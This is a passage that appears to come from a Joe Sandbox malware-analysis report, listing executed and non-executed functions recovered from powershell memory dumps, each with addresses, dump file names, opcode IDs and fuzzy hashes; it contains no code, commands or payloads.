                      • Instruction ID: 226a666ddd4abad7eddf78879e4b6eb7a7e89a245e0731957a07a7ffeeb628ec
                      • Opcode Fuzzy Hash: 5ba597f22e76edfacc48af08f65d083545ffdd50f306968413e5446397eacbfb
                      • Instruction Fuzzy Hash: 46E1B370909A4E8FEBA8DF68C8557E977E1EF55310F04826AE84DC7292CF78D8458BC1
                      Function 00007FFAACD8662B Relevance: .5, Instructions: 459COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2009744105.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaacd80000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 11382339bc72b6fe707fc3e8d2ae0197b5048bacc2f3b7caf3e0dbab400afead
                      • Instruction ID: 6b1bbeb80acefbdd0b30b93e7c1ba35c67c47c20d21c8e8df652635319a65b21
                      • Opcode Fuzzy Hash: 11382339bc72b6fe707fc3e8d2ae0197b5048bacc2f3b7caf3e0dbab400afead
                      • Instruction Fuzzy Hash: 11E17C76A0EB8A8FFB95DB2888555B87BE1EF46230F5441BAD05DC30D3DE18D90A83C1
                      Function 00007FFAACD87643 Relevance: .4, Instructions: 411COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2009744105.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaacd80000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e1d8736f78a75b6aaf2d0d860e22c42d7687b49287cea9dafd8bd0cf75744db1
                      • Instruction ID: 735b12d2d2a68e081e9a63e8f82666dd9203474b658e1b1d203a569b0dd223e7
                      • Opcode Fuzzy Hash: e1d8736f78a75b6aaf2d0d860e22c42d7687b49287cea9dafd8bd0cf75744db1
                      • Instruction Fuzzy Hash: 70C13662F0EB8ACFF795A76848555B4BBE1EF56320B4941BAE06DC70D3DE18D908C381
                      Function 00007FFAACD867A7 Relevance: .2, Instructions: 159COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2009744105.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaacd80000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1739c17e2c2a80c7d28e543189c94e45664da0884374bd5e4a63dabb3c7ff22e
                      • Instruction ID: fec19dd3d43cd2bf0fe8b248e25f0b9c30e022609e7763733534ae6b29009d30
                      • Opcode Fuzzy Hash: 1739c17e2c2a80c7d28e543189c94e45664da0884374bd5e4a63dabb3c7ff22e
                      • Instruction Fuzzy Hash: 37511966A0FA868FF795972848555B8AAF1EF46230F9840B9D06DC31D3DE18DD4983C1
                      Function 00007FFAACD87822 Relevance: .1, Instructions: 114COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2009744105.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaacd80000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08561573520347ba9be084351dccb2766a16454a2059e5e9fe09424f7c7278ae
                      • Instruction ID: 001de5aed17509474aba25c72f1a9430b9da92d2284ff027a803a1c521c6765f
                      • Opcode Fuzzy Hash: 08561573520347ba9be084351dccb2766a16454a2059e5e9fe09424f7c7278ae
                      • Instruction Fuzzy Hash: AF313B52F1FAD7CBF3A597685815178EAD1AF46360B9901BAF02DC30C3DE08D90883D2
                      Function 00007FFAACCB3535 Relevance: .0, Instructions: 49COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2008530488.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaaccb0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                      • Instruction ID: 0876e16cec43259223deada696c57105323c648c42327e8c1cd8719112e2e9bd
                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                      • Instruction Fuzzy Hash: 1D01447111CB088FD748EF0CE455AA5B7E0FF99364F10056DE58AC3665DA26E881CB45

                      Non-executed Functions

                      Function 00007FFAACCB044D Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2008530488.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaaccb0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8,8$P/8$p08$-8$/8
                      • API String ID: 0-3573041664
                      • Opcode ID: 8722e3cb8c22ee9f5965c5e039aba8896a4cb3bda8ec7b36c09de527338b734c
                      • Instruction ID: 9ba878278435f2987f58110c9970ecbd4bbfed3850c4da3ba8e3b7713e23edf2
                      • Opcode Fuzzy Hash: 8722e3cb8c22ee9f5965c5e039aba8896a4cb3bda8ec7b36c09de527338b734c
                      • Instruction Fuzzy Hash: 2E3170D680F7C05FF3165BE51825179AF60AF53600B19C0FBE0DC8A9E798099D0DCB96

                      Executed Functions

                      Function 0300F1F0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: \VDk
                      • API String ID: 0-2262503381
                      • Opcode ID: c0bdccb92b5f1f5d92a1755456fb8a278e379eaa8634dae1ddd010c46e3a8470
                      • Instruction ID: adc54b83d12b6f51e022a1e9b6f975be4dc0225adfe44a82e72afe9da5c27739
                      • Opcode Fuzzy Hash: c0bdccb92b5f1f5d92a1755456fb8a278e379eaa8634dae1ddd010c46e3a8470
                      • Instruction Fuzzy Hash: 38B16270E0120A8FEF64CFA9D8857DDBBF2BF88314F188129D815EB294EB749845DB41
                      Function 0300FAC0 Relevance: .3, Instructions: 266COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aa25df340141b949d1295681805fa1eac7a3500b9868c7fff34434394577c257
                      • Instruction ID: dbc1c2a3f22835028350a92a43b43667ba320720027dddf0b619e38d82044f4f
                      • Opcode Fuzzy Hash: aa25df340141b949d1295681805fa1eac7a3500b9868c7fff34434394577c257
                      • Instruction Fuzzy Hash: 93B18370E0130ACFEB64CFA8D89179DBBF2AF48314F188529D815EB294EB749845DF81
                      Function 07753D38 Relevance: 15.5, Strings: 12, Instructions: 541COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                      • API String ID: 0-3953147099
                      • Opcode ID: 354698a13a84ecb69c1ba77f5d0aad935fdb52bb41c0e11be7e62891b198ca4e
                      • Instruction ID: 1a0bbd24f6edc0718ad86644ee9358b979ae87aade7ee7311d1a1717395655d9
                      • Opcode Fuzzy Hash: 354698a13a84ecb69c1ba77f5d0aad935fdb52bb41c0e11be7e62891b198ca4e
                      • Instruction Fuzzy Hash: 4E025FB17043869FDB258B65D8016A67FF1EF862D5F2884ABDC05CB292DB71CC82C761
                      Function 077591D0 Relevance: 13.0, Strings: 10, Instructions: 540COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                      • API String ID: 0-4104424984
                      • Opcode ID: 0014ec886c83b70841882716847a7badf9a9837fa105e7d3fb81dfdbb310b87f
                      • Instruction ID: 0c58d24f5a3ba0990bd04a3ba545abf9f6c75947488f9d6ab682b285f14f8c1e
                      • Opcode Fuzzy Hash: 0014ec886c83b70841882716847a7badf9a9837fa105e7d3fb81dfdbb310b87f
                      • Instruction Fuzzy Hash: D10271B1B04306CFCB158B6994106AABBE1EFC6295F1488BBDE45CB281DB71EC46CF51
                      Function 0300BB00 Relevance: 10.5, Strings: 8, Instructions: 516COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8NDk$Hq$h]Dk$h]Dk$h]Dk$$q$$q$IDk
                      • API String ID: 0-927771526
                      • Opcode ID: 2b4a7f64b87c903ae8d57b309a8992a14938c0c6d5c0f2b6399e9e7ac0299fc6
                      • Instruction ID: 419b118a472cadc01d33635fabc27eea4c03a1539792ee9c36df03c9ccdf8afe
                      • Opcode Fuzzy Hash: 2b4a7f64b87c903ae8d57b309a8992a14938c0c6d5c0f2b6399e9e7ac0299fc6
                      • Instruction Fuzzy Hash: 06225F34B012148FEB25DB24C854BAEB7F2AF89344F1445E9D80AAB3A5CF359D85CF81
                      Function 077574A8 Relevance: 8.2, Strings: 6, Instructions: 664COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                      • API String ID: 0-1794337482
                      • Opcode ID: ff5f1debdda559aa46e34f9c6afb9ccecda39f54b2a9a8ee5a75a9b65dd5f0c9
                      • Instruction ID: 98ad322167207591db7db16726c7243ca56f5789ab00c54bf3b070c21aec4e8d
                      • Opcode Fuzzy Hash: ff5f1debdda559aa46e34f9c6afb9ccecda39f54b2a9a8ee5a75a9b65dd5f0c9
                      • Instruction Fuzzy Hash: 855270B4B00219DFDB24CF58D850B9ABBB2BB85344F14C5A9D909AB351CB71ED81CFA1
                      Function 07751D28 Relevance: 7.9, Strings: 6, Instructions: 404COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$$q$$q$$q$$q
                      • API String ID: 0-1538229613
                      • Opcode ID: f25fae15ee2a76692abf8d61d8c5c6d587220d9d8408fde7052e8943adb106cc
                      • Instruction ID: 6493403aba6e009af815050312a185c91d988562a7740d502dfd461c933cc60d
                      • Opcode Fuzzy Hash: f25fae15ee2a76692abf8d61d8c5c6d587220d9d8408fde7052e8943adb106cc
                      • Instruction Fuzzy Hash: 49D16EF1B0534A8FDB159B6998007A7BBA1FF86292F14C87BDD05CB242DB71D842C7A1
                      Function 07758BF0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                      • API String ID: 0-1794337482
                      • Opcode ID: 71a8b743c5573fc29ca7ce45a1a02d8f1723d0c039cce5d210febfea6d43b5a3
                      • Instruction ID: 7ba1e6b75b54a5566321d221c6ee071b2a54c2fb4715dfcd56f199169bf75c1c
                      • Opcode Fuzzy Hash: 71a8b743c5573fc29ca7ce45a1a02d8f1723d0c039cce5d210febfea6d43b5a3
                      • Instruction Fuzzy Hash: 6FD18EB0B003199FDB14DB68D450B9EBBB2AF89384F54C429D9056F395CB75EC42CBA2
                      Function 0775B060 Relevance: 5.6, Strings: 4, Instructions: 587COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q$4'q
                      • API String ID: 0-4210068417
                      • Opcode ID: 40caf30a8eee83553c7935055378367d06d5cc25ce13bfe05651084ef3f9213c
                      • Instruction ID: 36f34d015f222bd5d87623d74839022dbcd624110520aa133f72ff222d26fd22
                      • Opcode Fuzzy Hash: 40caf30a8eee83553c7935055378367d06d5cc25ce13bfe05651084ef3f9213c
                      • Instruction Fuzzy Hash: 931269F1B043058FD7258B6894117BABBA2AFC6295F14C87ADD05CF2A1DB71DC42C7A2
                      Function 07758BD0 Relevance: 4.0, Strings: 3, Instructions: 273COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q$4'q
                      • API String ID: 0-3126650252
                      • Opcode ID: 2b9f57cc65d409c81dddf6645afbc9f3f82a500481f78a6e2801b23b5857b986
                      • Instruction ID: 5f12c5b8e646893ffb34b60cea7964dc096656c9459ef767548a75534c0bf50b
                      • Opcode Fuzzy Hash: 2b9f57cc65d409c81dddf6645afbc9f3f82a500481f78a6e2801b23b5857b986
                      • Instruction Fuzzy Hash: 30B19CB0A003099FDB14DF54C450B9EBBB2AF89384F14C45AD9056F395CBB5EC86CBA2
                      Function 07756468 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q
                      • API String ID: 0-1467158625
                      • Opcode ID: 0646d449a0f82059c9a29d8a9e5b808487c50562313e666527a204e6e6b41a14
                      • Instruction ID: 8e2408d356ff60ea15c912d3675e82f1ca746e790e1c59126fcdfaec0de5f252
                      • Opcode Fuzzy Hash: 0646d449a0f82059c9a29d8a9e5b808487c50562313e666527a204e6e6b41a14
                      • Instruction Fuzzy Hash: 327269B4B003088FDB14CB58C854B9ABBF2BB89748F54C569D9099F395CB72EC42CB91
                      Function 07757B23 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q
                      • API String ID: 0-1467158625
                      • Opcode ID: 55c5a81f6f6a6fdc52c0ee2fda4c176145d0a03838720ed587514d450a9c911a
                      • Instruction ID: 29baad7d41f07aa6e8a2d43a04eb096ed3375dd853963b0f33d39fe0902478ff
                      • Opcode Fuzzy Hash: 55c5a81f6f6a6fdc52c0ee2fda4c176145d0a03838720ed587514d450a9c911a
                      • Instruction Fuzzy Hash: C7F15070B003149FEB24DB54C950BAA7BB3BB85344F10C4A9D909AF795CB75ED828FA1
                      Function 07755D70 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: tPq$tPq
                      • API String ID: 0-4270251778
                      • Opcode ID: 00c7721ec3afdbc53394843b5e5109f165ccf97875bd43c29cb18457941b2399
                      • Instruction ID: 312afcd31b815c789a6b0f5bb9643e398eb56fefbb13a5bbf85e62f1cd438b10
                      • Opcode Fuzzy Hash: 00c7721ec3afdbc53394843b5e5109f165ccf97875bd43c29cb18457941b2399
                      • Instruction Fuzzy Hash: DA917DB17003059FDB249B28D851B7ABBE3AFC1691F28886ADC05DB3C1DA71DC52C7A1
                      Function 0300C7B8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: h]Dk$IDk
                      • API String ID: 0-1406409803
                      • Opcode ID: a26c9b4a2fef5132474509d70ebb3b417abd780bd753347f055dd17a321edcb1
                      • Instruction ID: 8c38c355a99719f59747b4e29b6bc9c3b65f542a8b4295d619e72ebd9d53c9f4
                      • Opcode Fuzzy Hash: a26c9b4a2fef5132474509d70ebb3b417abd780bd753347f055dd17a321edcb1
                      • Instruction Fuzzy Hash: 16314B34A011188FEB25DB74C891BEEB7B2EF89344F1045E9C509AB395CB359E85CF81
                      Function 07751D0A Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $q$$q
                      • API String ID: 0-3126353813
                      • Opcode ID: 9a11d13582a5ab70632775ddafc881d2f19047c8e79c9b899f130d376544169b
                      • Instruction ID: 599a49b67b7fe03b868c548d69b871336131d208b989d1a7c8a8b4eb3fac78e5
                      • Opcode Fuzzy Hash: 9a11d13582a5ab70632775ddafc881d2f19047c8e79c9b899f130d376544169b
                      • Instruction Fuzzy Hash: 63112BB160834ADFD7258B14D800B61BF75EF83292F5985A7DC04CB292DBB1DC10CB51
                      Function 077599AA Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q$4'q
                      • API String ID: 0-1467158625
                      • Opcode ID: cd24099f14afc56f09cc4d960fc1e357a339839286a73e86562061b73f8c9149
                      • Instruction ID: 0baa0739fcbdb1d3c971f4fe8cc69ae5ca72d052cf25d386f15879f15f154382
                      • Opcode Fuzzy Hash: cd24099f14afc56f09cc4d960fc1e357a339839286a73e86562061b73f8c9149
                      • Instruction Fuzzy Hash: EFF0F9B1B08349CFD6254375581227D7795EBC71C071848A6CE41C7251EB64A803CB62
                      Function 0775644B Relevance: 1.9, Strings: 1, Instructions: 651COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'q
                      • API String ID: 0-1807707664
                      • Opcode ID: 0b7456fbc7c8f04c4260aba6249fc3db48c3274e68476019cbd8c30b0e8503ec
                      • Instruction ID: d2a261cf9bde072cfb6b01dad629f72193a4eb0075af710a894f5e5a8a29d9c8
                      • Opcode Fuzzy Hash: 0b7456fbc7c8f04c4260aba6249fc3db48c3274e68476019cbd8c30b0e8503ec
                      • Instruction Fuzzy Hash: BA5248B4B003059FDB14CB58C540B99BBF2BB89758F54C5A9E9099F356CB72EC82CB81
                      Function 0300F1E4 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: \VDk
                      • API String ID: 0-2262503381
                      • Opcode ID: 7fced0d969b2ee3483d8e84812ae350d4c4d591f93f26082f15a8f4b29a3ce20
                      • Instruction ID: 2caa2217e03795d9b936b15e3b6c0cdd3db42ff6d78cfe15dde65e282fcd3a41
                      • Opcode Fuzzy Hash: 7fced0d969b2ee3483d8e84812ae350d4c4d591f93f26082f15a8f4b29a3ce20
                      • Instruction Fuzzy Hash: 68B15070E0120A9FEB64CFA9D8857DDBBF2BF88314F188129D815EB294EB749845DB41
                      Function 07751FB2 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $q
                      • API String ID: 0-1301096350
                      • Opcode ID: 423b4802af17a66bf6213ebe4108b567e7556630b9c2d1535447d338569c5516
                      • Instruction ID: fac9228d53817b20b6348d7da6824c9a0851482c4c3464b6bbd6fad9acbc3cd4
                      • Opcode Fuzzy Hash: 423b4802af17a66bf6213ebe4108b567e7556630b9c2d1535447d338569c5516
                      • Instruction Fuzzy Hash: 74717BF57093859FD7254B289800367BFB1FF82290F1988ABDD48CB693C675D846C7A2
                      Function 07755D56 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: tPq
                      • API String ID: 0-789928099
                      • Opcode ID: 3347cea6c3ecc25a8b826933c9e4641479f5c237c6cf9db305af5e2e910a25db
                      • Instruction ID: d080da5bbb4c4f89a401fe3706d8b429dc30fbb76ab728bab54f56578fae3de7
                      • Opcode Fuzzy Hash: 3347cea6c3ecc25a8b826933c9e4641479f5c237c6cf9db305af5e2e910a25db
                      • Instruction Fuzzy Hash: 0E4126B0B003059FDB148F24D891BAABBF3AF85280F19885AEC059F2D1DB71DC51C7A5
                      Function 07756D51 Relevance: .5, Instructions: 459COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d9e0003ebd2984ab69f044d4e0bf081c7097729d7461ce4b180ff95a91d95e0
                      • Instruction ID: 905037128991b4def0f174a7c6f1acd8ace2488d255c57793bf0f59008699c4e
                      • Opcode Fuzzy Hash: 6d9e0003ebd2984ab69f044d4e0bf081c7097729d7461ce4b180ff95a91d95e0
                      • Instruction Fuzzy Hash: 3D1249B4A00305DFDB14CB58C950BA9BBB2FB85754F64C5A9E9099F391CB72EC81CB81
                      Function 03004EA8 Relevance: .3, Instructions: 333COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a82edab662c717f953835e74376ba4e6f9c6c2af5653fe90079658b541d3966d
                      • Instruction ID: aff175714e117626ab8a26b16dc37e370f6a98f9bbbcbf985ca7a33989f90294
                      • Opcode Fuzzy Hash: a82edab662c717f953835e74376ba4e6f9c6c2af5653fe90079658b541d3966d
                      • Instruction Fuzzy Hash: 73D11B34A052189FEB15CF98D884AADFBB2FF89310F188555E445AB3A5C735ED82CF90
                      Function 030045C0 Relevance: .3, Instructions: 320COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ab7ccce6953a96424d0be89a44a125e930e26a400e47e2983d227b741e2de79
                      • Instruction ID: b51ac206b92e23a155326d1586011a31c11adb74ab58d8a59f545f1cf8730adb
                      • Opcode Fuzzy Hash: 2ab7ccce6953a96424d0be89a44a125e930e26a400e47e2983d227b741e2de79
                      • Instruction Fuzzy Hash: C5D1F634A012189FEB14CF99D484A9DBBF2FF88310F288559E948AB355C731AD82CF95
                      Function 03009580 Relevance: .3, Instructions: 316COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b7d7c658d185ad752aa97ddc15bdec0ad7d4fa16737d0d71b7dea2ee20c7bcc
                      • Instruction ID: 4006299a9218e7040bd384fe3026b410ef4af864c57dbd4927a9db807bbd469a
                      • Opcode Fuzzy Hash: 7b7d7c658d185ad752aa97ddc15bdec0ad7d4fa16737d0d71b7dea2ee20c7bcc
                      • Instruction Fuzzy Hash: F0C17F35A012089FEB14DFA4D584A9DBBF6FF85310F194559D806AF3A6CB34ED49CB80
                      Function 0300FAB4 Relevance: .3, Instructions: 262COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b8c907ecbb62bae7be0e421e76f9fa29396c8a601b1155b876b98db4cbe7de4
                      • Instruction ID: 18312cf6b76e37a7cbcf7a2a1d1e985d42ad8fc9b38cec9429fd24bc06c5bbac
                      • Opcode Fuzzy Hash: 0b8c907ecbb62bae7be0e421e76f9fa29396c8a601b1155b876b98db4cbe7de4
                      • Instruction Fuzzy Hash: D4B17070E0130A8FEB64CFA8D99179DBBF2AF48314F188529D815EB294EB749845DF81
                      Function 077560C0 Relevance: .2, Instructions: 247COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7666af85cfca3b4f9e3564861ce4309b9329682911d8027e85227843116c30ef
                      • Instruction ID: 8aac7af14dbdc5ace2b8b54486f3d00453224556c967d755b2af2083072f5717
                      • Opcode Fuzzy Hash: 7666af85cfca3b4f9e3564861ce4309b9329682911d8027e85227843116c30ef
                      • Instruction Fuzzy Hash: 249181B0B102049FE714DB54C854BAEBBE2AF89744FA0C469DD05AF791CB71EC81CB65
                      Function 077560A2 Relevance: .2, Instructions: 230COMMON
                      Download Yara Rule
